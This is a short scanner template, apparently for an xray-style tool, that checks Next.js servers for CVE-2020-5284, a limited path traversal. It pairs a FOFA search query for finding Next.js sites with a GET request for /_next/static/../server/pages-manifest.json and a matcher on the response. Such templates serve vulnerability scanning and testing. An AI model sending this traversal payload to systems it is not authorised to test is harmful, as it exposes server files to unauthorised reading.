漏洞描述
前端目录遍历浏览
fofa "Next.js"
id: CVE-2020-5284
info:
name: Next.js .next limited path traversal
author: 不动明王
severity: medium
verified: true
description: |
前端目录遍历浏览
fofa "Next.js"
rules:
r0:
request:
method: GET
path: /_next/static/../server/pages-manifest.json
expression: 'response.status == 200 && response.headers["content-type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)'
expression: r0()